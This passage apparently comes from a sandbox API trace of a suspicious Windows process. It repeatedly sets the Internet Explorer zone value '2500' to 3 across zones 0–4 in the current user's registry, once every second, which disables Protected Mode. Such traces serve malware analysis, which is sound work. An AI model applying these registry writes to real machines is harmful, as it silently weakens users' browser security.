	[0109.299] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0109.299] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0109.303] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0109.303] RegCloseKey (hKey=0x694) returned 0x0
	[0109.303] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0109.304] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0109.304] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0109.304] RegCloseKey (hKey=0x694) returned 0x0
	[0109.304] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0109.304] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0109.304] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0109.304] RegCloseKey (hKey=0x694) returned 0x0
	[0109.304] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0109.304] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0109.304] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0109.304] RegCloseKey (hKey=0x694) returned 0x0
	[0109.304] Sleep (dwMilliseconds=0x3e8) 
	[0110.310] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0110.310] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0110.311] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0110.311] RegCloseKey (hKey=0x694) returned 0x0
	[0110.311] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0110.311] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0110.311] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0110.311] RegCloseKey (hKey=0x694) returned 0x0
	[0110.311] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0110.311] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0110.311] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0110.311] RegCloseKey (hKey=0x694) returned 0x0
	[0110.311] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0110.311] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0110.311] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0110.312] RegCloseKey (hKey=0x694) returned 0x0
	[0110.312] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0110.312] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0110.312] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0110.312] RegCloseKey (hKey=0x694) returned 0x0
	[0110.312] Sleep (dwMilliseconds=0x3e8) 
	[0111.345] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0111.345] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0111.345] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0111.345] RegCloseKey (hKey=0x694) returned 0x0
	[0111.345] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0111.345] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0111.346] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0111.346] RegCloseKey (hKey=0x694) returned 0x0
	[0111.346] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0111.346] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0111.346] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0111.346] RegCloseKey (hKey=0x694) returned 0x0
	[0111.346] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0111.346] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0111.346] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0111.346] RegCloseKey (hKey=0x694) returned 0x0
	[0111.346] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0111.346] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0111.346] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0111.346] RegCloseKey (hKey=0x694) returned 0x0
	[0111.346] Sleep (dwMilliseconds=0x3e8) 
	[0112.391] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0112.391] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0112.391] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0112.391] RegCloseKey (hKey=0x690) returned 0x0
	[0112.391] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0112.391] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0112.391] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0112.391] RegCloseKey (hKey=0x690) returned 0x0
	[0112.392] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0112.392] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0112.392] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0112.392] RegCloseKey (hKey=0x690) returned 0x0
	[0112.392] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0112.392] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0112.392] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0112.392] RegCloseKey (hKey=0x690) returned 0x0
	[0112.392] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0112.392] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0112.392] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0112.392] RegCloseKey (hKey=0x690) returned 0x0
	[0112.392] Sleep (dwMilliseconds=0x3e8) 
	[0113.428] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0113.428] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0113.429] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0113.429] RegCloseKey (hKey=0x690) returned 0x0
	[0113.429] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0113.429] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0113.429] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0113.429] RegCloseKey (hKey=0x690) returned 0x0
	[0113.429] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0113.429] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0113.429] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0113.429] RegCloseKey (hKey=0x690) returned 0x0
	[0113.429] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0113.429] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0113.429] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0113.430] RegCloseKey (hKey=0x690) returned 0x0
	[0113.430] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0113.430] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0113.430] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0113.430] RegCloseKey (hKey=0x690) returned 0x0
	[0113.430] Sleep (dwMilliseconds=0x3e8) 
	[0114.456] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0114.456] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0114.458] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0114.458] RegCloseKey (hKey=0x698) returned 0x0
	[0114.458] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0114.458] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0114.458] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0114.458] RegCloseKey (hKey=0x698) returned 0x0
	[0114.458] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0114.458] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0114.458] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0114.459] RegCloseKey (hKey=0x698) returned 0x0
	[0114.459] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0114.459] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0114.459] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0114.459] RegCloseKey (hKey=0x698) returned 0x0
	[0114.459] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0114.459] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0114.459] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0114.459] RegCloseKey (hKey=0x698) returned 0x0
	[0114.459] Sleep (dwMilliseconds=0x3e8) 
	[0115.517] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0115.517] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0115.518] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0115.518] RegCloseKey (hKey=0x698) returned 0x0
	[0115.518] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0115.518] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0115.518] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0115.518] RegCloseKey (hKey=0x698) returned 0x0
	[0115.518] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0115.518] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0115.519] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0115.519] RegCloseKey (hKey=0x698) returned 0x0
	[0115.519] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0115.519] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0115.519] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0115.520] RegCloseKey (hKey=0x698) returned 0x0
	[0115.520] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0115.520] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0115.520] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0115.520] RegCloseKey (hKey=0x698) returned 0x0
	[0115.520] Sleep (dwMilliseconds=0x3e8) 
	[0116.544] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0116.544] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0116.545] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0116.545] RegCloseKey (hKey=0x698) returned 0x0
	[0116.545] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0116.545] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0116.545] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0116.545] RegCloseKey (hKey=0x698) returned 0x0
	[0116.545] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0116.545] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0116.545] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0116.545] RegCloseKey (hKey=0x698) returned 0x0
	[0116.545] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0116.545] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0116.545] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0116.545] RegCloseKey (hKey=0x698) returned 0x0
